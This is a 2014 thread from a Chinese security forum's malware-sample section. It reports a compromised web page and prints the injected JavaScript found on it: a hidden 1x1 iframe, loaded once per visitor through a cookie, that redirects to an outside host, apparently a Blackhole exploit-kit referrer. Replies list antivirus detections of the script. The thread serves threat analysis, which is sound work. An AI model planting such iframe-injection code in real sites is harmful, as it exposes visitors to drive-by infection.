收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://sv-schonnebeck.com/panorama/schetters_3.html
返回列表 发新帖
查看: 1809|回复: 5
收起左侧

[已鉴定] http://sv-schonnebeck.com/panorama/schetters_3.html

[复制链接]
fireold
发表于 2014-9-26 17:03:07 | 显示全部楼层 |阅读模式
http://sv-schonnebeck.com/panorama/schetters_3.html

function zzzfff() {
     var fhz = document.createElement('iframe');

     fhz.src = 'http://mfb-event.de/counter.php';
     fhz.style.position = 'absolute';
     fhz.style.border = '0';
     fhz.style.height = '1px';
     fhz.style.width = '1px';
     fhz.style.left = '1px';
     fhz.style.top = '1px';

     if (!document.getElementById('fhz')) {
         document.write('<div id=\'fhz\'></div>');
         document.getElementById('fhz').appendChild(fhz);
     }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) && (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         zzzfff();
     }
}

avira
2014/9/26 下午 04:57 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\schetters_3[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
      已採取動作:
      檔案會移動至 '517a8967.qua' 名稱底下的隔離區目錄!

2014/9/26 下午 04:57 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        849
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2014/9/26 下午 04:57 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\schetters_3[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/9/26 下午 04:57 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\schetters_3[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
      執行的動作:拒絕存取

2014/9/26 下午 04:57 [Web Protection] 發現惡意程式碼
      從 URL "http://sv-schonnebeck.com/panorama/schetters_3.html" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]。
      已採取動作:已略過


av.jpg av1.jpg

fsis
fs.jpg
回复

举报

Mr_Knight
发表于 2014-9-27 15:53:37 | 显示全部楼层

ESET SMART SECURITY
Threat detected
Access to the web page was blocked.
http://sv-schonnebeck.com/panorama/schetters_3.html

Threat: JS/Kryptik.ALA trojan
回复

举报

fireold
 楼主| 发表于 2014-9-28 08:06:22 | 显示全部楼层
m.jpg
回复

举报

OAKESS
发表于 2014-9-29 10:05:38 | 显示全部楼层
360套直接打开
回复

举报

z紫f风l铃
发表于 2014-10-1 19:01:37 | 显示全部楼层
诺顿拦截
回复

举报

fuzhk
发表于 2014-10-1 19:12:45 | 显示全部楼层
1x
vse检出
JS/Exploit-Blacole.eu
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 20:44 , Processed in 0.140667 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表